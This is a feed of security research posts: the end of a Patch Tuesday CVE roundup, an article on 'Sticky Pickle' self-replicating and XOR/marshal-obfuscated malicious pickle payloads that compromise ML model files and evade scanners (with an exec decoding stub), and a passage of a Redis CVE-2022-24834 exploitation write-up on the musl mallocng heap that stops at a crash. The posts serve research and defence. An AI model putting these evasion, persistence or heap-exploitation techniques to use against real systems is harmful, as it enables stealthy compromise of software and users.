CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30074 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30075 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30077 Windows OLE Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-35265 Windows Perception Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30069 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 4.7 No No Info
CVE-2024-30094 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30095 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30083 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30062 Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30093 Windows Storage Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-30065 Windows Themes Denial of Service Vulnerability Important 5.5 No No DoS
CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30086 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30066 Winlogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-30067 WinLogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-5493 * Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC High N/A No No RCE
CVE-2024-5494 * Chromium: CVE-2024-5494 Use after free in Dawn High N/A No No RCE
CVE-2024-5495 * Chromium: CVE-2024-5495 Use after free in Dawn High N/A No No RCE
CVE-2024-5496 * Chromium: CVE-2024-5496 Use after free in Media Session High N/A No No RCE
CVE-2024-5497 * Chromium: CVE-2024-5497 Out of bounds memory access in Keyboard Inputs High N/A No No RCE
CVE-2024-5498 * Chromium: CVE-2024-5498 Use after free in Presentation API High N/A No No RCE
CVE-2024-5499 * Chromium: CVE-2024-5499 Out of bounds write in Streams API High N/A No No RCE

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

 

Looking at the other fixes addressing code execution bugs, there are a couple that stand out. In addition to the Wi-Fi bug above, there are two similar bugs in the Link Layer Topology Discovery Protocol with similar exploit vectors. The difference is that for these two bugs, the target needs to be running the Network Map functionality for the attack to succeed. There are several “open-and-own” type vulnerabilities getting patched. The one to look out for would be the Office bug that states, “The Preview Pane is an attack vector, but additional user interaction is required.” It’s not clear how that would manifest. The exploit for DFS requires an adjacent attacker to already be executing code on a target, which reads more like an EoP to me. The OLE bug requires connecting to a malicious SQL server. The bug in the Speech Application Programming Interface (SAPI) requires a user to click a link to connect to the attacker’s server. Lastly, the code execution bug in Dynamics 365 requires authentication, which again sounds more like an EoP, but it also states no user interaction is required. It’s an odd write-up that implies it’s unlikely to be exploited in the wild.

More than half of this month’s release corrects privilege escalation bugs, but the majority of these lead to SYSTEM-level code execution if an authenticated user runs specially crafted code. Other privilege escalation bugs would allow the attacker to get to the level of the running application. The bugs in Winlogon are somewhat intriguing as they could allow an attacker to replace valid file content with specially crafted file content. One of the kernel bugs could be used for a container escape. The bug in the Perception Service could allow elevation to the “NT AUTHORITY\LOCAL SERVICE” account. The vulnerability in Visual Studio requires an attacker to create a malicious extension. An authenticated user would then need to create a Visual Studio project that uses that extension. If they manage all of that, it would lead to admin privileges.

The bug in Azure Identity Libraries and Microsoft Authentication Library allows attackers to read any file on the target with SYSTEM privileges. The privilege escalation in Azure Monitor Agent could let attackers delete files and folders. If you’ve disabled Automatic Extension Upgrades, you’ll need to perform a manual update to ensure the Monitor Agent is at the latest version. Speaking of extra actions, the bug in the Azure Science Virtual Machine (DSVM) requires you to upgrade your DSVM to Ubuntu 20.04. If you’re not familiar with this procedure, Microsoft provides this article for guidance. Attackers who exploit this bug could gain access to user credentials, which would allow them to impersonate authorized users.

There are only three information disclosure bugs receiving fixes this month and only one results in info leaks consisting of unspecified memory contents. The bug in the on prem version of Dynamics 365 could allow an attacker to exfiltrate all the data accessible to the logged-on user. The vulnerability in the Cryptographic Services could disclose sensitive information such as KeyGuard (KG) keys, which are intended to be per-boot and used to protect sensitive data. If an attacker could potentially use these to decrypt anything encrypted with those keys.

The final bugs for June address Denial-of-Service (DoS) vulnerabilities in Windows and Azure components. Unfortunately, Microsoft provides no additional information about these bugs and how they would manifest on affected systems. They do note the DoS in the DHCP Server does not affect those who have configured failover for their DHCP setup.

There are no new advisories in this month’s release.

Looking Ahead

The next Patch Tuesday of 2024 will be on July 9, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Exploiting ML models with pickle file attacks: Part 2

11 June 2024 at 15:00

By Boyan Milanov

In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call Sticky Pickle, incorporates a self-replicating mechanism that propagates its malicious payload into successive versions of the compromised model. Additionally, Sticky Pickle uses obfuscation to disguise the malicious code to prevent detection by pickle file scanners.

Making malicious pickle payloads persistent

Recall from our previous blog post that Sleepy Pickle exploits rely on injecting a malicious payload into a pickle file containing a packaged ML model. This payload is executed when the pickle file is deserialized to a Python object, compromising the model’s weights and/or associated code. If the user decides to modify the compromised model (e.g., fine-tuning) and then re-distribute it, it will be serialized in a new pickle file that the attacker does not control. This process will likely render the exploit ineffective.

To overcome this limitation we developed Sticky Pickle, a self-replication mechanism that wraps our model-compromising payload in an encapsulating, persistent payload. The encapsulating payload does the following actions as it’s executed:

    1. Find the original compromised pickle file being loaded on the local filesystem.
    2. Open the file and read the encapsulating payload’s bytes from disk. (The payload cannot access them directly via its own Python code.)
    3. Hide its own bytecode in the object being unpickled under a predefined attribute name.
    4. Hook the pickle.dump() function so that when an object is re-serialized, it:
      • Serializes the object using the regular pickle.dump() function.
      • Detects that the object contains the bytecode attribute.
      • Manually injects the bytecode in the new Pickle file that was just created.

Figure 1: Persistent payload in malicious ML model files

With this technique, malicious pickle payloads automatically spread to derivative models without leaving a trace on the disk outside of the infected pickle file. Moreover, the ability to hook any function in the Python interpreter allows for other attack variations as the attacker can access other local files, such as training datasets or configuration files.

Payload obfuscation: Going under the radar

Another limitation of pickle-based exploits arises from the malicious payload being injected directly as Python source code. This means that the malicious code appears in plaintext in the Pickle file. This has several drawbacks. First, it is possible to detect the attack with naive file scanning and a few heuristics that target the presence of significant chunks of raw Python within Pickle files. Second, it’s easy for security teams to identify the attack and its intent just by looking at it.

We developed a payload obfuscation and encoding method that overcomes these limitations and makes payload detection much harder. Starting with our original payload consisting of code that compromises the pickled ML model, we modify it in two ways.

First, we obfuscate the payload by compiling it into a Python code object and serializing it into a string with the marshal library. This lets us inject this serialized payload string into the pickle file, followed by a special bytecode sequence. When executed, this special sequence calls marshal.loads() on the string to reconstruct the code object of the payload and execute it. This makes the payload completely unreadable to scanners or human inspection as it is injected as compiled Python bytecode instead of source code.

Second, we use a simple XOR encoding to vary the payload in every infected file. Instead of consisting of only the original model-compromising code, the XORed payload contains the XOR-encoded Python source of the original payload and a decoding and execution stub similar to this:

def compromise_model(model):
    # The string of the XOR-encoded python payload source code
    encoded_payload = 
    # This line decodes the payload and executes it
    exec(bytearray(b ^ 0x{XOR_KEY:X} for b in encoded_payload))
    return model

Since the obfuscation key can take any value and is hardcoded in the decoding stub, this method complements the persistence feature by allowing attackers to write a payload that generates a new obfuscation key upon reinjection in a new pickle file. This results in different Python payloads, code objects, and final pickle payloads being injected into compromised files, while the malicious behavior remains unchanged.

Figure 2: Obfuscation of the Python payload before injection in a pickle file

Figure 2 shows how this obfuscation method completely hides the malicious payload within the file. Automated tools or security analysts scanning the file would see only:

  1. The raw bytes of the Python payload that was compiled and then marshaled. It is difficult, if not impossible, to interpret these bytes and flag them as dangerous with static scanning.
  2. The pickle sequence that calls marshal.loads(). This is a common pattern also found in benign pickle files and thus is not sufficient to alert users about potential malicious behavior.

When a pickle file containing the obfuscated payload is loaded, the payload stages are executed in the following order, illustrated in figure 3:

  1. The malicious pickle opcodes load the raw bytes of the serialized code object, then reconstruct the Python code object using marshal.load(), and finally execute the code object.
  2. The code object is executed and decodes the XOR-encoded Python source code of the original payload.
  3. The decoded original payload code is executed and compromises the loaded ML model.

Figure 3: Overview of execution stages of the obfuscated payload

Sealing the lid on pickle

These persistence and evasion techniques show the level of sophistication that pickle exploits can achieve. Expanding on the critical risks we demonstrated in part one of this series, we’ve seen how a single malicious pickle file can:

  • Compromise other local pickle files and ML models.
  • Evade file scanning and make manual analysis significantly harder.
  • Make its payload polymorphic and spread it under an ever-changing form while maintaining the same final stage and end goal.

While these are only examples among other possible attack improvements, persistence and evasion are critical aspects of pickle exploits that, to our knowledge, have not yet been demonstrated.

Despite the risks posed by pickle files, we acknowledge that It will be a long-term effort for major frameworks of the ML ecosystem to move away from them. In the short-term, here are some action steps you can take to eliminate your exposure to these issues:

  • Avoid using pickle files to distribute serialized models.
  • Adopt safer alternatives to pickle files such as HuggingFace’s SafeTensors.
  • If you must use pickle files, scan them with our very own Fickling to detect pickle-based ML attacks.

Long-term, we are continuing our efforts to drive the ML industry to adopt secure-by-design technologies. If you want to learn more about our contributions, check out our awesome-ml-security and ml-file-formats Github repositories and our recent responsible disclosure of a critical GPU vulnerability called Leftover Locals!

Acknowledgments

Thanks to our intern Russel Tran for their hard work on pickle payload obfuscation and optimization.

Pumping Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an Alpine mallocng Heap

11 June 2024 at 14:36

This post is about exploiting CVE-2022-24834 against a Redis
container running on Alpine
Linux
. CVE-2022-24834 is a vulnerability affecting the Lua cjson
module in Redis servers <=7.0.11. The bug is an integer overflow that
leads to a large copy of data, approximately 350MiB.

A colleague from NCC Group wanted to exploit this bug but found that
the public exploits didn’t work. This was ultimately due to those
exploits being written to target Ubuntu or similar distros, which use
the GNU libc library.
The target in our case was Alpine 13.8, which uses musl libc 1.2.4. The important
distinction here is that GNU libc uses the ptmalloc2 heap allocator, and
musl 1.2.4 uses its own custom allocator called mallocng. This resulted
in some interesting differences during exploitation, which I figured I
would document since there’s not a lot of public information about
targeting the musl heap.

I highly recommend reading Ricerca Security’s original writeup,
which goes into depth about the vulnerability and how they approached
exploitation on ptmalloc2. Conviso Lab’s has a README.md that
describes some improvements that they made, which is also worth a look.
There are quite a few differences between exploitation on ptmalloc2 and
mallocng, which I’ll explain as I go. I’ll try not to repeat the details
that previous research has already provided but rather focus on the
parts that differed for mallocng.

Finally, I want to note that I am not attacking the musl mallocng
allocator by corrupting its metadata, but rather I’m doing Lua-specific
exploitation on the mallocng heap, mimicking the strategy done by the
original exploit.

Lua 5.1

As the previous articles covered Lua internals in detail, I won’t
repeat that information here. Redis uses Lua 5.1, so it’s important to
refer to the specific version when reading, as Lua has undergone
significant changes across different releases. These changes include
structure layouts and the garbage collection algorithm utilized.

I would like to highlight that Lua utilizes Tagged Values to
represent various internal types such as numbers and tables. The
structure is defined as follows:

/*
** Tagged Values
*/

#define TValuefields                                                           \
    Value value;                                                               \
    int   tt

typedef struct lua_TValue {
    TValuefields;
} TValue;

In this structure, tt denotes the type, and
value can either be an inline value or a pointer depending
on the associated type. In Lua, a Table serves as the
primary storage type, akin to a dictionary or list in Python. It
contains an array of TValue structures. For simple types
like integers, value is used directly. However, for more
complex types like nested tables, value acts as a pointer.
For further implementation details, please refer to Lua’s
lobject.h file or the aforementioned articles.

During debugging, I discovered the need to inspect Lua 5.1 objects.
The Alpine redis-server target did not include symbols for
the static Lua library. To address this, I compiled my own version of
Lua and filtered out all function symbols to only access the structure
definitions easily. This was achieved by identifying and stripping out
all FUNC symbols using readelf -Ws and
objcopy --strip-symbol.

Additionally, I came across the GdbLuaExtension,
which offers pretty printers and other functionalities for analyzing Lua
objects, albeit supporting version 5.3 only. I made some minor
modifications
to enable its compatibility with Lua 5.1. These
changes enabled features like pretty printers for tables, although I
didn’t conduct exhaustive testing on the required functionalities.

This method provides a clearer analysis of objects like a
Table, presenting information in a more readable format
compared to a hexdump.

(gdb) p/x *(Table *) 0x7ffff7a05100
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffaf9ef620 <lua_table^> 0x7ffff4a76322,
  [2] = (TValue *) 0x7fffaf9ef630 <lua_table^> 0x7ffff7a051a0,
  [3] = (TValue *) 0x7fffaf9ef640 <lua_table^> 0x7ffff7a051f0,
  [4] = (TValue *) 0x7fffaf9ef650 <lua_table^> 0x7ffff7a05290,
  [5] = (TValue *) 0x7fffaf9ef660 <lua_table^> 0x7ffff7a052e0,

The Table we printed shows an array of
TValue structures, and we can see that each
TValue in our table is referencing another table.

Musl’s Next
Generation Allocator – aka mallocng

On August 4, 2020,
musl 1.2.1 shipped a new heap algorithm called “mallocng”. This
allocator has received some good quality research in the past,
predominantly focused on CTF challenge exploitation. I didn’t find any
real-world exploitation examples, but if someone knows of some, please
let me know and I’ll update the article.

The mallocng allocator is slab-based and organizes fixed-sized
allocations (called slots) on multi-page slabs (called
groups). In general, groups are mmap()-backed.
However, groups containing small slots may actually be less than a size
of a page, in which case the group is actually just a larger fixed-sized
slot on a larger group. The allocator not using brk() is an
important detail as we will see later. The fixed size for a given group
is referred to as the group’s stride.

The mallocng allocator seems to be designed with security in mind,
mixing a combination of in-band metadata that contains some cookies,
with predominantly out-of-band metadata which is stored in slots on
dedicated group mappings that are prefixed with guard pages to prevent
corruption from linear overflows.

As I’m not actually going to be exploiting the allocator internals
itself, I won’t go into too much detail about the data structures. I
advise you to read pre-existing articles, which you can find in the
resource section.

There’s a useful gdb plugin called muslheap developed by
xf1les, which I made a lot of use of. xf1les also has an associated blog
post
which is worth reading. At the time of writing, I have a PR open to add
this functionality to pwndbg, and hopefully will have time add some more
functionality to it afterwards.

There is one particularly interesting aspect of the allocator that I
want to go over, which is that it can adjust the starting offset of
slots inside a group across subsequent allocations, using a value it
calls the cycling offset. It only does so if the overhead of a given
slot inside the fixed size has a large enough remainder such that the
offset can be adjusted. Interestingly, in this case, because the slot we
are working in is the 0x50-stride group, and the Table
structure is 0x48 bytes, this cycling offset doesn’t apply. Since I
narrowly avoided having to deal with this, and originally thought I
would have to, I’ll still take a moment to explain what the mitigation
actually is for and what it looks like in practice.

mallocng Cycling Offset

The cycling offset is a technique used to mitigate double frees,
although it can have a negative effect on other exploitation scenarios
as well. It works by adjusting the offset of the user data part of an
allocation each time a chunk is used, wrapping back to the beginning
once the offset is larger than the slack space. The offset starts at 1
and increments each time the chunk is reused.

The idea behind mitigating a double free is that if a chunk is used
and then freed, and then re-used, the offset used for the second
allocation will not be the same as the first time, due to cycling. Then,
when it is double freed, that free will detect some in-band metadata
anomaly and fail.

The allocator goes about this offset cycling by abusing the fact that
groups have fixed-sized slots, and often the user data being allocated
will not fill up the entire space of the slot, resulting in some slack
space. If the remaining slack space in the slot is large enough, which
is calculated by subtracting both the size of the user data and the
required in-line metadata, then there are actually two in-line metadata
blocks used inside a slot. One contains an offset used to indicate the
actual start of the user data, and that user data will still have some
metadata prefixed before it.

The offset calculation is done in the enframe()
function in mallocng. Basically, each time a slot is allocated, the
offset is increased, and will wrap back around when it exceeds the size
of the slack.

To demonstrate what the cycling offset looks like in practice, I will
focus on larger-than-Table stride groups, that have enough
slack such that the cycling offset will be used. If we review what the
stride sizes are, we see:

sizeclass stride sizeclass stride sizeclass stride sizeclass stride
1 0x20 13 0x140 25 0xaa0 37 0x5540
2 0x30 14 0x190 26 0xcc0 38 0x6650
3 0x40 15 0x1f0 27 0xff0 39 0x7ff0
4 0x50 16 0x240 28 0x1240 40 0x9240
5 0x60 17 0x2a0 29 0x1540 41 0xaaa0
6 0x70 18 0x320 30 0x1990 42 0xccc0
7 0x80 19 0x3f0 31 0x1ff0 43 0xfff0
8 0x90 20 0x480 32 0x2480 44 0x12480
9 0xa0 21 0x540 33 0x2aa0 45 0x15540
10 0xc0 22 0x660 34 0x3320 46 0x19980
11 0xf0 23 0x7f0 35 0x3ff0 47 0x1fff0

Using a cycling offset requires an additional 4-byte in-band header
and also increases by UNIT-sized (16-byte) increments. As
such, I think it’s unlikely for strides <= 0xf0 to have the cycling
offset applied (though I haven’t tested each). There might be some
exceptions, like if sometimes smaller allocations are placed into larger
strides rather than always allocating a new group, but I’m not sure if
that’s possible as I haven’t spent enough time studying the allocator
yet.

In light of this understanding, for the sake of demonstrating when
cycling offsets are used, we’ll look at the 0x140 stride. I allocate a
few tables, fill their arrays such that the resulting sizes are ~0x100
bytes.

I use Lua to leak the address of an outer table. Then in gdb I
analyze the array of all the tables it references, which should be of
increasing size. Let’s look at the first inner table’s array first:

pwndbg> p/x *(Table *)  0x7ffff7a945b0
$2 = <lua_table> = {
  [1] = (TValue *) 0x7ffff7a99880 <lua_table^> 0x7ffff7a94740,
  [2] = (TValue *) 0x7ffff7a99890 <lua_table^> 0x7ffff7a93d80,
  [3] = (TValue *) 0x7ffff7a998a0 <lua_table^> 0x7ffff7a93e70,
  [4] = (TValue *) 0x7ffff7a998b0 <lua_table^> 0x7ffff7a95040,
  [5] = (TValue *) 0x7ffff7a998c0 <lua_table^> 0x7ffff7a950e0,
...
pwndbg> p/x ((Table *)  0x7ffff7a94740)->array
$4 = 0x7ffff7a94e40
pwndbg> mchunkinfo 0x7ffff7a94e40
============== IN-BAND META ==============
        INDEX : 2
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x29 (group --> 0x7ffff7a94ba0)

================= GROUP ================== (at 0x7ffff7a94ba0)
         meta : 0x555555a69040
   active_idx : 2

================== META ================== (at 0x555555a69040)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a94ba0
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]UU (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a94e30)
      cycling offset : 0x1 (userdata --> 0x7ffff7a94e40)
        nominal size : 0x100
       reserved size : 0x2c
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

The first chunk we see under the == SLOT == head has a
cycling offset of 1. We can see that the slot itself starts at
0x7ffff7a94e30, but the user data does not start at the same address,
but rather 0x10-bytes further. This is due to the cycling offset *
UNIT adjustment. If we quickly look at a Table
(stride 0x50) slot, which is of a size that doesn’t allow enough slack
to use a cycling offset, we can see the difference:

pwndbg> mchunkinfo 0x7ffff7a94740
============== IN-BAND META ==============
        INDEX : 11
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x37 (group --> 0x7ffff7a943c0)

================= GROUP ================== (at 0x7ffff7a943c0)
         meta : 0x555555a68ea0
   active_idx : 11

================== META ================== (at 0x555555a68ea0)
         prev : 0x555555a686f8
         next : 0x555555a68d38
          mem : 0x7ffff7a943c0
     last_idx :
   avail_mask : 0x0   (0b00000000000)
   freed_mask : 0x5ac (0b10110101100)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]FUFFUFUFFUU (from slot 11 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : Do nothing

================== SLOT ================== (at 0x7ffff7a94740)
      cycling offset : 0x0 (userdata --> 0x7ffff7a94740)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

Above, we see the SLOT section indicates a cycling
offset of 0. This will hold true for all Table allocations
in a stride 0x50 group. In this case, the user data starts at the same
location as the slot.

So now let’s look at the second stride 0x140 group’s slot that we
allocated earlier:

pwndbg> p/x ((Table *)  0x7ffff7a93d80)->array
$4 = 0x7ffff7a96ca0
pwndbg> mchunkinfo 0x7ffff7a96ca0
============== IN-BAND META ==============
        INDEX : 1
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x17 (group --> 0x7ffff7a96b20)

================= GROUP ================== (at 0x7ffff7a96b20)
         meta : 0x555555a690e0
   active_idx : 2

================== META ================== (at 0x555555a690e0)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a96b20
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: U[U]U (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a96c70)
      cycling offset : 0x3 (userdata --> 0x7ffff7a96ca0)
        nominal size : 0x100
       reserved size : 0xc
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

This second array has a cycling offset of 3, so it starts 0x30 bytes
further than the start of the slot. Clearly, this slot has been used a
few times already.

The main takeaways here are:

  • For certain allocation sizes, the exact offset of an overflow may be
    unreliable unless you know exactly how many times the slot has been
    allocated.
  • For a scenario like overwriting the LSB of a pointer inside of such
    a group, you could be unable to predict where the resulting pointer will
    point inside of another slot, depending on whether you know how many
    times each slot has been used.

Considering all this in the context of the exploit this article
describes, I think that because we have fine-grained control over all
the allocations performed for our overflow, this mitigation wouldn’t
have stopped us. Even if the structures had been on a ‘stride’ group
that uses the cycling offsets, because we can easily control the number
of times the slots are actually used prior to overflow. That said, since
I originally thought it might be a problem and wanted to understand it,
hopefully the explanation was still interesting.

With that out of the way, let’s look into how to exploit
CVE-2022-24834 on the musl heap.

Exploiting
CVE-2022-24834 on the mallocng heap

To quickly recap the vulnerability, it’s an integer overflow when
calculating the size of a buffer to allocate while doing cjson encoding.
By triggering the overflow, we end up with an undersized buffer that we
can write 0x15555555 bytes to (341 MiB), which may be large enough to
qualify as a “wild copy,” although on a 64-bit target and the amount of
memory on modern systems, it’s not too hard to deal with. Exploitation
requires that the target buffer that we want to corrupt must be adjacent
to the overflown buffer with no unmapped gaps in between, so at a
minimum around 350 MiB.

While exploiting ptmalloc2, Ricerca Security solved this problem by
extending the heap, which is brk()-based, to ensure that
enough space exists. Once the extension occurs, it won’t be shrunk
backward. This makes it easy to ensure no unmapped memory regions exist,
and that the 0x15555555-byte copy won’t hit any invalid memory.

This adjacent memory requirement poses some different problems on the
mallocng heap, which I’ll explain shortly.

After achieving the desired layout, the goal is to overwrite some
target chunk (or slot in our case) with the 0x22 value corresponding to
the ending double quote. In the Ricerca Security write-up, their
diagrams indicated they overwrote the LSB pointer of a
Table->array pointer; however, I believe their exploit
actually overwrites the LSB of a TValue->value pointer,
which exists in a chunk that is pointed to by the
Table->array. I may misunderstand their exploit, but at
any rate, the latter is the approach I used.

To summarize, the goal of the heap shaping is ultimately to ensure
that the allocation associated with a table’s array, which is pointed to
by Table->array, is adjacent to the buffer we overflow
so that we corrupt the TValue.

mallocng Heap Shaping

mallocng requires a different strategy than ptmalloc2, as it does not
use brk(). Rather, it will use mmap() to
allocate groups (below I will assume that the group itself is not a slot
of another group) and populate those groups with various fixed-size
slots. Freeing the group, which may occur if all of the slots in a group
are no longer used, results in memory backing the group to be unmapped
using munmap().

 

This means we must leverage feng shui to have valid in-use
allocations adjacent to each other at the time of the overflow. While
doing this, in order to analyze gaps in the memory space, I wrote a
small gdb utility which I’ll use to show the layout that we are working
with. A slightly modified version of this utility has also now been
added to pwndbg.

First, let’s look at what happens if we trigger the bug and allow the
copy to happen, without first shaping the heap. Note this first example
is showing the entire memory space to give an idea of what it looks
like, but in future output, I will limit what’s shown to more relevant
mappings.

The annotations added to to the mapping output are as follows:

  • ^-- ADJ: <num> indicates a series of adjacent
    memory regions, where <num> is the accumulated
    size
  • !!! GUARD PAGE indicates a series of pages with no
    permissions, which writing to would trigger a fault
  • [00....0] -- GAP: <num> indicates an unmapped
    page between mapped regions of memory, where <num> is
    the size of the gap
   0: 0x555555554000 - 0x5555555bf000    0x6b000 r--p
   2: 0x5555555bf000 - 0x555555751000   0x192000 r-xp
   3: 0x555555751000 - 0x5555557d3000    0x82000 r--p
   4: 0x5555557d3000 - 0x5555557da000     0x7000 r--p
   5: 0x5555557da000 - 0x555555833000    0x59000 rw-p
   6: 0x555555833000 - 0x555555a66000   0x233000 rw-p ^-- ADJ: 0x512000
   7: 0x555555a66000 - 0x555555a67000     0x1000 ---p !!! GUARD PAGE
   7: 0x555555a67000 - 0x555555af7000    0x90000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa2ed09000
   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x24348000
  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000
  13: 0x7ffff4717000 - 0x7ffff4c01000   0x4ea000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x1000
  14: 0x7ffff4c02000 - 0x7ffff4e00000   0x1fe000 rw-p
  15: 0x7ffff4e00000 - 0x7ffff5201000   0x401000 rw-p
  16: 0x7ffff5201000 - 0x7ffff5c00000   0x9ff000 rw-p
  17: 0x7ffff5c00000 - 0x7ffff5e01000   0x201000 rw-p
  18: 0x7ffff5e01000 - 0x7ffff6000000   0x1ff000 rw-p ^-- ADJ: 0x13fe000
  19: 0x7ffff6000000 - 0x7ffff6002000     0x2000 ---p !!! GUARD PAGE
  19: 0x7ffff6002000 - 0x7ffff6404000   0x402000 rw-p
  21: 0x7ffff6404000 - 0x7ffff6600000   0x1fc000 rw-p ^-- ADJ: 0x5fe000
  22: 0x7ffff6600000 - 0x7ffff6602000     0x2000 ---p !!! GUARD PAGE
  22: 0x7ffff6602000 - 0x7ffff6a04000   0x402000 rw-p
  24: 0x7ffff6a04000 - 0x7ffff6a6e000    0x6a000 rw-p
  25: 0x7ffff6a6e000 - 0x7ffff6c00000   0x192000 rw-p ^-- ADJ: 0x5fe000
  26: 0x7ffff6c00000 - 0x7ffff6c02000     0x2000 ---p !!! GUARD PAGE
  26: 0x7ffff6c02000 - 0x7ffff7004000   0x402000 rw-p
  28: 0x7ffff7004000 - 0x7ffff7062000    0x5e000 rw-p
  29: 0x7ffff7062000 - 0x7ffff715c000    0xfa000 rw-p
  30: 0x7ffff715c000 - 0x7ffff71ce000    0x72000 rw-p
  31: 0x7ffff71ce000 - 0x7ffff7200000    0x32000 rw-p
  32: 0x7ffff7200000 - 0x7ffff7a00000   0x800000 rw-p
  33: 0x7ffff7a00000 - 0x7ffff7a6f000    0x6f000 rw-p ^-- ADJ: 0xe6d000
  34: 0x7ffff7a6f000 - 0x7ffff7a71000     0x2000 ---p !!! GUARD PAGE
  34: 0x7ffff7a71000 - 0x7ffff7ac5000    0x54000 rw-p
  36: 0x7ffff7ac5000 - 0x7ffff7b0e000    0x49000 r--p
  37: 0x7ffff7b0e000 - 0x7ffff7dab000   0x29d000 r-xp
  38: 0x7ffff7dab000 - 0x7ffff7e79000    0xce000 r--p
  39: 0x7ffff7e79000 - 0x7ffff7ed2000    0x59000 r--p
  40: 0x7ffff7ed2000 - 0x7ffff7ed5000     0x3000 rw-p
  41: 0x7ffff7ed5000 - 0x7ffff7ed8000     0x3000 rw-p
  42: 0x7ffff7ed8000 - 0x7ffff7ee9000    0x11000 r--p
  43: 0x7ffff7ee9000 - 0x7ffff7f33000    0x4a000 r-xp
  44: 0x7ffff7f33000 - 0x7ffff7f50000    0x1d000 r--p
  45: 0x7ffff7f50000 - 0x7ffff7f5a000     0xa000 r--p
  46: 0x7ffff7f5a000 - 0x7ffff7f5e000     0x4000 rw-p
  47: 0x7ffff7f5e000 - 0x7ffff7f62000     0x4000 r--p
  48: 0x7ffff7f62000 - 0x7ffff7f64000     0x2000 r-xp
  49: 0x7ffff7f64000 - 0x7ffff7f78000    0x14000 r--p
  50: 0x7ffff7f78000 - 0x7ffff7fc4000    0x4c000 r-xp
  51: 0x7ffff7fc4000 - 0x7ffff7ffa000    0x36000 r--p
  52: 0x7ffff7ffa000 - 0x7ffff7ffb000     0x1000 r--p
  53: 0x7ffff7ffb000 - 0x7ffff7ffc000     0x1000 rw-p
  54: 0x7ffff7ffc000 - 0x7ffff7fff000     0x3000 rw-p ^-- ADJ: 0x58e000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7fdf000
  55: 0x7ffffffde000 - 0x7ffffffff000    0x21000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xffff7fffff601000
  56: 0xffffffffff600000 - 0xffffffffff601000     0x1000 --xp

When we crash we see:

Thread 1 "redis-server" received signal SIGSEGV, Segmentation fault.
0x00005555556cd676 in json_append_string ()
(gdb) x/i $pc
=> 0x5555556cd676 <json_append_string+166>:     mov    %al,(%rcx,%rdx,1)
(gdb) info registers rcx rdx
rcx            0x7ffff3749010      140737277890576
